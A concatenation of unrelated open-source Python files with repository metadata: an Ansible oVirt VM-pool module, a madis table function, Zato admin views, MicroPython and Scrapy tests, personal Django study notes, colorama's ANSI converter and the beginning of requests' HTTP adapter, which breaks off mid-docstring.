) if self._module.params['cluster'] else None,
template=otypes.Template(
name=self._module.params['template']
) if self._module.params['template'] else None,
max_user_vms=self._module.params['vm_per_user'],
prestarted_vms=self._module.params['prestarted'],
size=self._module.params['vm_count'],
type=otypes.VmPoolType(
self._module.params['type']
) if self._module.params['type'] else None,
)
def update_check(self, entity):
return (
equal(self._module.params.get('cluster'), get_link_name(self._connection, entity.cluster)) and
equal(self._module.params.get('description'), entity.description) and
equal(self._module.params.get('comment'), entity.comment) and
equal(self._module.params.get('vm_per_user'), entity.max_user_vms) and
equal(self._module.params.get('prestarted'), entity.prestarted_vms) and
equal(self._module.params.get('vm_count'), entity.size)
)
def main():
argument_spec = ovirt_full_argument_spec(
state=dict(
choices=['present', 'absent'],
default='present',
),
name=dict(default=None, required=True),
template=dict(default=None),
cluster=dict(default=None),
description=dict(default=None),
comment=dict(default=None),
vm_per_user=dict(default=None, type='int'),
prestarted=dict(default=None, type='int'),
vm_count=dict(default=None, type='int'),
type=dict(default=None, choices=['automatic', 'manual']),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
check_sdk(module)
check_params(module)
try:
auth = module.params.pop('auth')
connection = create_connection(auth)
vm_pools_service = connection.system_service().vm_pools_service()
vm_pools_module = VmPoolsModule(
connection=connection,
module=module,
service=vm_pools_service,
)
state = module.params['state']
if state == 'present':
ret = vm_pools_module.create()
# Wait for all VM pool VMs to be created:
if module.params['wait']:
vms_service = connection.system_service().vms_service()
for vm in vms_service.list(search='pool=%s' % module.params['name']):
wait(
service=vms_service.service(vm.id),
condition=lambda vm: vm.status in [otypes.VmStatus.DOWN, otypes.VmStatus.UP],
timeout=module.params['timeout'],
)
elif state == 'absent':
ret = vm_pools_module.remove()
module.exit_json(**ret)
except Exception as e:
module.fail_json(msg=str(e), exception=traceback.format_exc())
finally:
connection.close(logout=auth.get('token') is None)
if __name__ == "__main__":
main()
|
gpl-3.0
|
XristosMallios/cache
|
exareme-tools/madis/src/functions/vtable/sdc2db.py
|
4
|
6517
|
import os.path
import sys
import functions
import os
from itertools import repeat, imap
import cPickle
import cStringIO
import vtbase
import functions
import struct
import vtbase
import os
import re
import zlib
import apsw
from array import array
import marshal
if hasattr(sys, 'pypy_version_info'):
from __pypy__ import newlist_hint
def izip(*iterables):
# izip('ABCD', 'xy') --> Ax By
iterators = tuple(map(iter, iterables))
ilen = len(iterables)
res = [None] * ilen
while True:
ci = 0
while ci < ilen:
res[ci] = iterators[ci].next()
ci += 1
yield res
else:
from itertools import izip
newlist_hint = lambda size: []
registered=True
def imapm(function, iterable):
# imap(pow, (2,3,10), (5,2,3)) --> 32 9 1000
it = iter(iterable)
while True:
yield function(it.next())
def repeatm(object, times):
for i in xrange(times):
yield object
class SDC2DB(vtbase.VT):
def VTiter(self, *args,**formatArgs):
import msgpack
import bz2
serializer = msgpack
largs, dictargs = self.full_parse(args)
where = None
mode = 'row'
input = cStringIO.StringIO()
if 'file' in dictargs:
where=dictargs['file']
else:
raise functions.OperatorError(__name__.rsplit('.')[-1],"No destination provided")
col = 0
filename, ext=os.path.splitext(os.path.basename(where))
if 'cols' in dictargs:
a = re.split(' |,| , |, | ,' , dictargs['cols'])
column = [x for x in a if x != '']
else:
col = 1
start = 0
end = sys.maxint-1
if 'start' in dictargs:
start = int(dictargs['start'])
if 'end' in dictargs:
end = int(dictargs['end'])
fullpath = str(os.path.abspath(os.path.expandvars(os.path.expanduser(os.path.normcase(where)))))
fileIterlist = []
for x in xrange(start,end+1):
try:
fileIterlist.append(open(fullpath+"."+str(x), "rb"))
except:
break
if fileIterlist == []:
try:
fileIterlist = [open(where, "rb")]
except :
raise functions.OperatorError(__name__.rsplit('.')[-1],"No such file")
cursor = []
for filenum,fileIter in enumerate(fileIterlist):
blocksize = struct.unpack('!i',fileIter.read(4))
b = struct.unpack('!B',fileIter.read(1))
schema = cPickle.load(fileIter)
colnum = len(schema)
if filenum == 0:
yield schema
def createdb(where, tname, schema, page_size=16384):
c=apsw.Connection(where)
cursor=c.cursor()
list(cursor.execute('pragma page_size='+str(page_size)+';pragma cache_size=-1000;pragma legacy_file_format=false;pragma synchronous=0;pragma journal_mode=OFF;PRAGMA locking_mode = EXCLUSIVE'))
create_schema='create table '+tname+' ('
create_schema+='`'+unicode(schema[0][0])+'`'+ (' '+unicode(schema[0][1]) if schema[0][1]!=None else '')
for colname, coltype in schema[1:]:
create_schema+=',`'+unicode(colname)+'`'+ (' '+unicode(coltype) if coltype!=None else '')
create_schema+='); begin exclusive;'
list(cursor.execute(create_schema))
insertquery="insert into "+tname+' values('+','.join(['?']*len(schema))+')'
return c, cursor, insertquery
cur, cursor, insertquery=createdb(where+".db", filename, schema)
input = cStringIO.StringIO()
while True:
input.truncate(0)
try:
blocksize = struct.unpack('!i', fileIter.read(4))
except:
break
if blocksize[0]:
input.write(fileIter.read(blocksize[0]))
input.seek(0)
b = struct.unpack('!B', input.read(1))
if b[0]:
decompression = struct.unpack('!B', input.read(1))
if decompression[0] :
decompress = zlib.decompress
else:
decompress = bz2.decompress
type = '!'+'i'*(colnum*2+1)
ind = list(struct.unpack(type, input.read(4*(colnum*2+1))))
cols = [None]*colnum
for c in xrange(colnum):
s = serializer.loads(decompress(input.read(ind[c*2])))
if (len(s)>1 and ind[c*2+1]==0 and ind[colnum*2]>1):
cols[c] = s
else:
if len(s)==1:
tmp = s[0]
cols[c] = repeat(tmp, ind[colnum*2])
elif len(s)<256:
cols[c] = imap(s.__getitem__, array('B', decompress(input.read(ind[c*2+1]))))
else:
cols[c] = imap(s.__getitem__, array('H', decompress(input.read(ind[c*2+1]))))
# for r in izip(*cols):
# pass
cursor.executemany(insertquery, izip(*cols))
elif not b[0]:
schema = cPickle.load(fileIter)
list(cursor.execute('commit'))
cur.close()
try:
for fileObject in fileIterlist:
fileObject.close()
except NameError:
pass
def Source():
return vtbase.VTGenerator(SDC2DB)
if not ('.' in __name__):
"""
This is needed to be able to test the function, put it at the end of every
new function you create
"""
import sys
import setpath
from functions import *
testfunction()
if __name__ == "__main__":
reload(sys)
sys.setdefaultencoding('utf-8')
import doctest
doctest.testmod()
|
mit
|
AmrnotAmr/zato
|
code/zato-web-admin/src/zato/admin/web/views/security/tls/channel.py
|
6
|
1845
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2014 Dariusz Suchojad <dsuch at zato.io>
Licensed under LGPLv3, see LICENSE.txt for terms and conditions.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# stdlib
import logging
# Zato
from zato.admin.web.forms.security.tls.channel import CreateForm, EditForm
from zato.admin.web.views import CreateEdit, Delete as _Delete, Index as _Index
from zato.common.odb.model import TLSChannelSecurity
logger = logging.getLogger(__name__)
class Index(_Index):
output_class = TLSChannelSecurity
url_name = 'security-tls-channel'
template = 'zato/security/tls/channel.html'
service_name = 'zato.security.tls.channel.get-list'
class SimpleIO(_Index.SimpleIO):
input_required = ('cluster_id',)
output_required = ('id', 'name', 'value', 'is_active')
output_repeated = True
def handle(self):
return {
'create_form': CreateForm(),
'edit_form': EditForm(prefix='edit'),
}
class _CreateEdit(CreateEdit):
method_allowed = 'POST'
class SimpleIO(CreateEdit.SimpleIO):
input_required = ('name', 'value', 'is_active')
output_required = ('id', 'name')
def success_message(self, item):
return 'Successfully {} the TLS channel security definition [{}]'.format(self.verb, item.name)
class Create(_CreateEdit):
url_name = 'security-tls-channel-create'
service_name = 'zato.security.tls.channel.create'
class Edit(_CreateEdit):
url_name = 'security-tls-channel-edit'
form_prefix = 'edit-'
service_name = 'zato.security.tls.channel.edit'
class Delete(_Delete):
url_name = 'security-tls-channel-delete'
error_message = 'Could not delete the TLS channel security definition'
service_name = 'zato.security.tls.channel.delete'
|
gpl-3.0
|
mhoffma/micropython
|
tests/basics/with_return.py
|
82
|
1239
|
class CtxMgr:
def __init__(self, id):
self.id = id
def __enter__(self):
print("__enter__", self.id)
return self
def __exit__(self, a, b, c):
print("__exit__", self.id, repr(a), repr(b))
# simple case
def foo():
with CtxMgr(1):
return 4
print(foo())
# for loop within with (iterator needs removing upon return)
def f():
with CtxMgr(1):
for i in [1, 2]:
return i
print(f())
# multiple for loops within with
def f():
with CtxMgr(1):
for i in [1, 2]:
for j in [3, 4]:
return (i, j)
print(f())
# multiple for loops within nested withs
def f():
with CtxMgr(1):
for i in [1, 2]:
for j in [3, 4]:
with CtxMgr(2):
for k in [5, 6]:
for l in [7, 8]:
return (i, j, k, l)
print(f())
# multiple for loops that are optimised, and nested withs
def f():
with CtxMgr(1):
for i in range(1, 3):
for j in range(3, 5):
with CtxMgr(2):
for k in range(5, 7):
for l in range(7, 9):
return (i, j, k, l)
print(f())
|
mit
|
Eslamunto/Gestern-HIG
|
django/book-1/djangobook-1.py
|
1
|
13193
|
MODULE ONE!
Chapter One:
Django's Position on the Web'
NOTE: Text in here needs to be paraphrased as it was taken as copy-paste from the book directly.
Django's slogan
The web framework for perfectionists with deadlines.
MVC:
Models: These represent data organization in a database. In simple words,
we can say that each model defines a table in the database and the relations
between other models. It's thanks to them that every bit of data is stored in
the database
Views: These contain all the information that will be sent to the client. They
make views that the final HTML document will generate. We can associate
the HTML code with the views.
Controllers: These contain all the actions performed by the server and are not
visible to the client. The controller checks whether the user is authenticated
or it can generate the HTML code from a template.
<img src="img/1.png"/>
1. The client sends a request to the server asking to display a page.
2. The controller uses a database through models. It can create, read, update,
or delete any record or apply any logic to the retrieved data.
3. The model sends data from the database; for example, it sends a product list
if we have an online shop.
4. The controller injects data into a view to generate it.
5. The view returns its content depending on the data given by the controller.
6. The controller returns the HTML content to the client.
Django, in particular, uses an MVT pattern. In this pattern, views are replaced by
templates and controllers are replaced by views. In the rest of this book, we will be
using MVT patterns. Hence, our HTML code will be templates, and our Python code
will be views and models.
Chapter Two:
Creating a Django Project
A django project consists of applications, which are small modules for the project
To be able to use Django, you need to install the following software:
• Python 3, to enjoy the third version innovations.
• setuptools is a module that simplifies the installation of the external
Python module. However, it does not manage to uninstall the module.
• PIP extends the possibilities of setuptools by removing packages,
using easier syntax, and providing other benefits.
• Django, which that we are going to install thanks to PIP.
# to install python3
$ sudo apt-get install python3
Installing setuptools for Linux
When using APT, we do not need to install setuptools. Indeed, APT will automatically
install it before installing PIP.
Installing PIP
If you have installed Python 3.4 or later, PIP is included with Python.
for linux;
$ sudo apt-get install python-pip
or
$ sudo apt-get install python3-pip
Installing Django:
$ pip install Django
To start a new django project
$ django-admin startproject Work_manager
To start a new django application:
$ python manage.py startapp TasksManager
Chapter Three:
Hello World! with Django
REGEX:
# The beginning and the end of the line
To check whether a string must be present at the beginning or the end of the line,
you must use the ^ and $ characters. If ^ is present at the beginning of the string,
the validation will be done at the beginning of the chain. It works in the same way
for $ at the end.
* The ^test regular expression will validate test and test01l but not dktest
or ttest01
* The regular expression test$ will validate test and 01test, but not
test01
* The regular expression ^test$ will only validate test
# The any character regular expression
In a regular expression, the dot ( . ) means "any character". So, when you validate
characters that cannot be inferred, the dot is used. If you try to validate a dot in
your speech, use the escape character, \ .
* ^te.t validates test or tept
* ^test\.me$ only validates test.me
# Character classes
To validate the characters, you can use character classes. A character class is enclosed
in square brackets and contains all the allowed characters. To validate all the numbers
and letters in a location, you must use [0123456789a] . For example, ^tes[t0e]$ will
only validate the three chains: test , tes0 , and tese .
You can also use the following predefined classes:
• [0-9] is equivalent to [0123456789]
• [a-z] matches all the letters, [abcdefghijklmnopqrstuvwxyz]
• [A-Z] matches all uppercase letters
• [a-zA-Z] matches all the letters
The following are the shortcuts:
• \d is equivalent to [0-9]
• \w is equivalent to [a-zA-Z0-9_]
• [0-9] is equivalent to [0123456789]
# Validating the number of characters
To validate a character one or more times, you must use braces
{x, y} , where x defines the minimum number of occurrences and y is the maximum
number of occurrences. If one of them is not specified, you will have an undefined
value. For example, if you forget to include an element in {2,} , it means that the
character must be present at least twice.
^test{2, 3}$ only validates testt and testtt
^tests{0,1}$ only validates test and tests
. ^ {1} $ validates all the channels except one: the empty string
The following are the shortcuts:
• * is equivalent to {0}
• ? is equivalent to {0, 1}
• + is equivalent to {1}
To Run the development server:
$ python manage.py runserver 127.0.0.1:8000
Create a 'Hey There!' app in django 2.0.2:
1- in the project settings file, add the newly created app 'TaskManager' to the 'INSTALLED_APPS' variable
2- in the project urls file, add the following url path('task_manager/', include('TaskManager.urls')), to the URLPatterns list,
do not foret to import the 'include' from the django.urls
3- create urls.py file in the newly created application
from django.urls import path
from . import views
urlpatterns = [
path('index/', views.index),
]
4- and then add the following to the views.py in the newly created application.
def index(request):
return HttpResponse('Hey there')
Chapter Four:
Working with Templates
# TODO : write how to make a hello world program for django views
There are several functions to send variables to the template. The two main functions
are render() and render_to_response() . The render() function is very similar to
render_to_response () . The main difference is that if we use render , we do not
need to specify context_instance = RequestContext(request) in order to send
the current context. This is the context that will allow us to use the CSRF middleware
later in the book.
Templating language:
Integrating variables in templates
<span> {{my_var}} </ span>
Conditional statements:
<span>
{% if years < 10 %}
You are a child
{% elif years < 18 %}
You are a teenager
{% else %}
You are an adult!
{% endif %}
</span>
Looping in a template
<ul>
{% for city in array_city %}
<li>
{{ city }}
</li>
{% endfor %}
</ul>
Using filters: Filters are an effective way to modify the data before sending it to the template.
The upper and lower filters
The lower filter converts into lowercase letters, and the upper filter converts
into uppercase letters
The lower filter
The code for the lower filter is as follows:
<span> {{ my_hello | lower }} </span>
This code generates the following HTML code:
<span> hello world! </span>
The upper filter
The code for the upper filter is as follows:
<span> {{ my_hello | upper }} </span>
This code generates the following HTML code:
<span> HELLO WORLD! </span>
The capfirst filter
The capfirst filter transforms the first letter to uppercase. The example with the
myvar = "hello" variable is as follows:
<span>{{ my_hello | capfirst }}</span>
The pluralize filter
The pluralize filter can easily handle plurals. Often, developers choose a simple
solution for lack of time. The solution is to display channels: You have 2 products
in your cart.
You have {{ product }} nb_products {{ nb_products | pluralize }} in
our cart.
This channel will show the following three channels if nb_products is 1 and 2 :
You have 1 product in our cart.
You have 2 products in our cart.
I received {{ nb_diaries }} {{ nb_diaries|pluralize : "y , ies "}}.
The previous code will show the following two chains if nb_diaries is 1 and 2 :
I received one diary.
I received two diaries.
In the previous example, we used a filter that takes arguments for the first time.
To set parameters to a filter, you must use the following syntax:
{{ variable | filter:"parameters" }}
This filter helps to increase the quality of your site. A website looks much more
professional when it displays correct sentences.
The linebreaks filter:
The linebreaks filter allows you to convert line breaks into an HTML tag. A single
new line is transformed into the <br /> tag. A new line followed by a blank will
become a paragraph break , </p> :
<span>{{ text|linebreaks }}</span>
The truncatechars filter
The truncatechars filter allows you to truncate a string from a certain length. If this
number is exceeded, the string is truncated and Django adds the string " ... ".
The example of the variable that contains "Welcome in Django " is as follows:
{{ text|truncatechars:14 }}
Creating DRY URLs
<a href="{% url 'public_connection' %}">Connection</a>
{% url "url_name" param %}
{% url "url_name" param1, param2 %}
Extending the templates
The legacy of templates allows you to define a super template and a subtemplate that
inherits from the super template. In the super template, it is possible to define blocks
that subtemplates can fill. This method allows us to respect the DRY philosophy by
applying the common code to several templates in a super template.
Using static files in templates
To set the path where Django will look for static files, we have to change our
settings.py file by adding or changing the following line:
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, '../TasksManager/static/'),
)
<link href="{% static "css/style.css" %}" rel="stylesheet" type="text/
css" />
To use the tag in our static template, we must also load the system by putting the
following line before using the static tag:
{% load staticfiles %}
Chapter Five:
Working with Models
A model is an object that inherits from the Model class. The Model class is a Django
class that is specifically designed for data persistence.
We define fields in models. These properties allow us to organize data within a
model. To make a connection between databases and SQL, we can say that a model is
represented by a table in the database, and a model property is represented by a field
in the table.
Chapter Six:
Getting a Model's Data with Querysets
Querysets are used for data retrieval rather than for constructing SQL queries
directly. They are part of the ORM used by Django. An ORM is used to link the view
and controller by a layer of abstraction. In this way, the developer uses object model
types without the need to write a SQL query. We will use querysets to retrieve the
data we have stored in the database through models. These four operations are often
summarized by CRUD (Create, Read, Update, and Delete).
Getting data from the database
Getting multiple records
all_projects = Project.objects.all()
The all() method can be linked to a SQL SELECT * FROM query. Now, we will use
the filter() method to filter our results and make the equivalent of a SELECT *
FROM Project WHERE field = value query.
Filter example:
Project.objects.filter(client_name="Me")
Getting only one record
To retrieve a single record with a queryset, we should use the get() method as in
the following line:
first_project = Project.objects.get(id="1")
he get() method when used as the filter() method accepts filter arguments.
However, you should be careful with setting the filters that retrieve a single record.
If the argument to get() is client_name = "Me" , it would generate an error if we
had more than two records corresponding to client_name .
Updating multiple records
To edit multiple records in one shot, you must use the update() method with a
queryset object type. For example, our People customer is bought by a company
named Nobody , so we need to change all the projects where the client_name
property is equal to People :
from TasksManager.models import Project
from django.shortcuts import render
def page(request):
task = Project.objects.filter(client_name = "people").update(client_
name="Nobody")
return render(request, 'en/public/index.html', {'action' : 'Update
for many model'})
The update() method of a queryset can change all the records related to this
queryset. This method cannot be used on an instance of a model.
Deleting a record
To delete a record in the database, we must use the delete() method
Chapter Seven:
Working with Django Forms
Do not forget to add the CSRF token in all the forms of the site where protection is
enabled. HTML forms are also involved, and the one we have just made does not
include the token. For the previous form to work with CSRF protection, we need
to add the following line in the form of tags and <form> </form> :
{% csrf_token %}
Read about forms in django documentation, advanced usuage of django forms, validations and extending validations, customizing the display of error messages
using widgets, set initial data in form.
Chapter Eight:
Raising Your Productivity with CBV
|
mit
|
barraponto/scrapy
|
tests/test_logformatter.py
|
80
|
2131
|
import unittest
import six
from scrapy.spiders import Spider
from scrapy.http import Request, Response
from scrapy.item import Item, Field
from scrapy.logformatter import LogFormatter
class CustomItem(Item):
name = Field()
def __str__(self):
return "name: %s" % self['name']
class LoggingContribTest(unittest.TestCase):
def setUp(self):
self.formatter = LogFormatter()
self.spider = Spider('default')
def test_crawled(self):
req = Request("http://www.example.com")
res = Response("http://www.example.com")
logkws = self.formatter.crawled(req, res, self.spider)
logline = logkws['msg'] % logkws['args']
self.assertEqual(logline,
"Crawled (200) <GET http://www.example.com> (referer: None)")
req = Request("http://www.example.com", headers={'referer': 'http://example.com'})
res = Response("http://www.example.com", flags=['cached'])
logkws = self.formatter.crawled(req, res, self.spider)
logline = logkws['msg'] % logkws['args']
self.assertEqual(logline,
"Crawled (200) <GET http://www.example.com> (referer: http://example.com) ['cached']")
def test_dropped(self):
item = {}
exception = Exception(u"\u2018")
response = Response("http://www.example.com")
logkws = self.formatter.dropped(item, exception, response, self.spider)
logline = logkws['msg'] % logkws['args']
lines = logline.splitlines()
assert all(isinstance(x, six.text_type) for x in lines)
self.assertEqual(lines, [u"Dropped: \u2018", '{}'])
def test_scraped(self):
item = CustomItem()
item['name'] = u'\xa3'
response = Response("http://www.example.com")
logkws = self.formatter.scraped(item, response, self.spider)
logline = logkws['msg'] % logkws['args']
lines = logline.splitlines()
assert all(isinstance(x, six.text_type) for x in lines)
self.assertEqual(lines, [u"Scraped from <200 http://www.example.com>", u'name: \xa3'])
if __name__ == "__main__":
unittest.main()
|
bsd-3-clause
|
patrickglass/creo
|
creo/packages/colorama/ansitowin32.py
|
442
|
9262
|
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
import re
import sys
import os
from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
from .winterm import WinTerm, WinColor, WinStyle
from .win32 import windll
winterm = None
if windll is not None:
winterm = WinTerm()
def is_a_tty(stream):
return hasattr(stream, 'isatty') and stream.isatty()
class StreamWrapper(object):
'''
Wraps a stream (such as stdout), acting as a transparent proxy for all
attribute access apart from method 'write()', which is delegated to our
Converter instance.
'''
def __init__(self, wrapped, converter):
# double-underscore everything to prevent clashes with names of
# attributes on the wrapped stream object.
self.__wrapped = wrapped
self.__convertor = converter
def __getattr__(self, name):
return getattr(self.__wrapped, name)
def write(self, text):
self.__convertor.write(text)
class AnsiToWin32(object):
'''
Implements a 'write()' method which, on Windows, will strip ANSI character
sequences from the text, and if outputting to a tty, will convert them into
win32 function calls.
'''
ANSI_CSI_RE = re.compile('\033\[((?:\d|;)*)([a-zA-Z])') # Control Sequence Introducer
ANSI_OSC_RE = re.compile('\033\]((?:.|;)*?)(\x07)') # Operating System Command
def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
# The wrapped stream (normally sys.stdout or sys.stderr)
self.wrapped = wrapped
# should we reset colors to defaults after every .write()
self.autoreset = autoreset
# create the proxy wrapping our output stream
self.stream = StreamWrapper(wrapped, self)
on_windows = os.name == 'nt'
on_emulated_windows = on_windows and 'TERM' in os.environ
# should we strip ANSI sequences from our output?
if strip is None:
strip = on_windows and not on_emulated_windows
self.strip = strip
# should we should convert ANSI sequences into win32 calls?
if convert is None:
convert = on_windows and not wrapped.closed and not on_emulated_windows and is_a_tty(wrapped)
self.convert = convert
# dict of ansi codes to win32 functions and parameters
self.win32_calls = self.get_win32_calls()
# are we wrapping stderr?
self.on_stderr = self.wrapped is sys.stderr
def should_wrap(self):
'''
True if this class is actually needed. If false, then the output
stream will not be affected, nor will win32 calls be issued, so
wrapping stdout is not actually required. This will generally be
False on non-Windows platforms, unless optional functionality like
autoreset has been requested using kwargs to init()
'''
return self.convert or self.strip or self.autoreset
def get_win32_calls(self):
if self.convert and winterm:
return {
AnsiStyle.RESET_ALL: (winterm.reset_all, ),
AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT),
AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL),
AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL),
AnsiFore.BLACK: (winterm.fore, WinColor.BLACK),
AnsiFore.RED: (winterm.fore, WinColor.RED),
AnsiFore.GREEN: (winterm.fore, WinColor.GREEN),
AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW),
AnsiFore.BLUE: (winterm.fore, WinColor.BLUE),
AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA),
AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
AnsiFore.RESET: (winterm.fore, ),
AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True),
AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True),
AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True),
AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True),
AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True),
AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True),
AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True),
AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True),
AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
AnsiBack.RED: (winterm.back, WinColor.RED),
AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW),
AnsiBack.BLUE: (winterm.back, WinColor.BLUE),
AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA),
AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
AnsiBack.WHITE: (winterm.back, WinColor.GREY),
AnsiBack.RESET: (winterm.back, ),
AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True),
AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True),
AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True),
AnsiBack.LIGHTYELLOW_EX: (winterm.back, WinColor.YELLOW, True),
AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True),
AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True),
AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True),
AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True),
}
return dict()
def write(self, text):
if self.strip or self.convert:
self.write_and_convert(text)
else:
self.wrapped.write(text)
self.wrapped.flush()
if self.autoreset:
self.reset_all()
def reset_all(self):
if self.convert:
self.call_win32('m', (0,))
elif not self.wrapped.closed and is_a_tty(self.wrapped):
self.wrapped.write(Style.RESET_ALL)
def write_and_convert(self, text):
'''
Write the given text to our wrapped stream, stripping any ANSI
sequences from the text, and optionally converting them into win32
calls.
'''
cursor = 0
text = self.convert_osc(text)
for match in self.ANSI_CSI_RE.finditer(text):
start, end = match.span()
self.write_plain_text(text, cursor, start)
self.convert_ansi(*match.groups())
cursor = end
self.write_plain_text(text, cursor, len(text))
def write_plain_text(self, text, start, end):
if start < end:
self.wrapped.write(text[start:end])
self.wrapped.flush()
def convert_ansi(self, paramstring, command):
if self.convert:
params = self.extract_params(command, paramstring)
self.call_win32(command, params)
def extract_params(self, command, paramstring):
if command in 'Hf':
params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';'))
while len(params) < 2:
# defaults:
params = params + (1,)
else:
params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0)
if len(params) == 0:
# defaults:
if command in 'JKm':
params = (0,)
elif command in 'ABCD':
params = (1,)
return params
def call_win32(self, command, params):
if command == 'm':
for param in params:
if param in self.win32_calls:
func_args = self.win32_calls[param]
func = func_args[0]
args = func_args[1:]
kwargs = dict(on_stderr=self.on_stderr)
func(*args, **kwargs)
elif command in 'J':
winterm.erase_screen(params[0], on_stderr=self.on_stderr)
elif command in 'K':
winterm.erase_line(params[0], on_stderr=self.on_stderr)
elif command in 'Hf': # cursor position - absolute
winterm.set_cursor_position(params, on_stderr=self.on_stderr)
elif command in 'ABCD': # cursor position - relative
n = params[0]
# A - up, B - down, C - forward, D - back
x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command]
winterm.cursor_adjust(x, y, on_stderr=self.on_stderr)
def convert_osc(self, text):
for match in self.ANSI_OSC_RE.finditer(text):
start, end = match.span()
text = text[:start] + text[end:]
paramstring, command = match.groups()
if command in '\x07': # \x07 = BEL
params = paramstring.split(";")
# 0 - change title and icon (we will only change title)
# 1 - change icon (we don't support this)
# 2 - change title
if params[0] in '02':
winterm.set_title(params[1])
return text
|
apache-2.0
|
Andr3as/CodiadDirect
|
SublimeText2/requests/adapters.py
|
6
|
15239
|
# -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import socket
from .models import Response
from .packages.urllib3 import Retry
from .packages.urllib3.poolmanager import PoolManager, proxy_from_url
from .packages.urllib3.response import HTTPResponse
from .packages.urllib3.util import Timeout as TimeoutSauce
from .compat import urlparse, basestring, urldefrag, unquote
from .utils import (DEFAULT_CA_BUNDLE_PATH, get_encoding_from_headers,
prepend_scheme_if_needed, get_auth_from_url)
from .structures import CaseInsensitiveDict
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import TimeoutError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3.exceptions import ProxyError as _ProxyError
from .cookies import extract_cookies_to_jar
from .exceptions import ConnectionError, Timeout, SSLError, ProxyError
from .auth import _basic_auth_str
DEFAULT_POOLBLOCK = False
DEFAULT_POOLSIZE = 10
DEFAULT_RETRIES = 0
class BaseAdapter(object):
"""The Base Transport Adapter"""
def __init__(self):
super(BaseAdapter, self).__init__()
def send(self):
raise NotImplementedError
def close(self):
raise NotImplementedError
class HTTPAdapter(BaseAdapter):
"""The built-in HTTP Adapter for urllib3.
Provides a general-case interface for Requests sessions to contact HTTP and
HTTPS urls by implementing the Transport Adapter interface. This class will
usually be created by the :class:`Session <Session>` class under the
covers.
:param pool_connections: The number of urllib3 connection pools to cache.
:param pool_maxsize: The maximum number of connections to save in the pool.
:param int max_retries: The maximum number of retries each connection
should attempt. Note, this applies only to failed connections and
timeouts, never to requests where the server returns a response.
:param pool_block: Whether the connection pool should block for connections.
Usage::
>>> import requests
>>> s = requests.Session()
>>> a = requests.adapters.HTTPAdapter(max_retries=3)
>>> s.mount('http://', a)
"""
__attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
'_pool_block']
def __init__(self, pool_connections=DEFAULT_POOLSIZE,
pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
pool_block=DEFAULT_POOLBLOCK):
self.max_retries = max_retries
self.config = {}
self.proxy_manager = {}
super(HTTPAdapter, self).__init__()
self._pool_connections = pool_connections
self._pool_maxsize = pool_maxsize
self._pool_block = pool_block
self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)
def __getstate__(self):
return dict((attr, getattr(self, attr, None)) for attr in
self.__attrs__)
def __setstate__(self, state):
# Can't handle by adding 'proxy_manager' to self.__attrs__ because
# because self.poolmanager uses a lambda function, which isn't pickleable.
self.proxy_manager = {}
self.config = {}
for attr, value in state.items():
setattr(self, attr, value)
self.init_poolmanager(self._pool_connections, self._pool_maxsize,
block=self._pool_block)
def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs):
"""Initializes a urllib3 PoolManager.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param connections: The number of urllib3 connection pools to cache.
:param maxsize: The maximum number of connections to save in the pool.
:param block: Block when no free connections are available.
:param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager.
"""
# save these values for pickling
self._pool_connections = connections
self._pool_maxsize = maxsize
self._pool_block = block
self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
block=block, **pool_kwargs)
def proxy_manager_for(self, proxy, **proxy_kwargs):
"""Return urllib3 ProxyManager for the given proxy.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
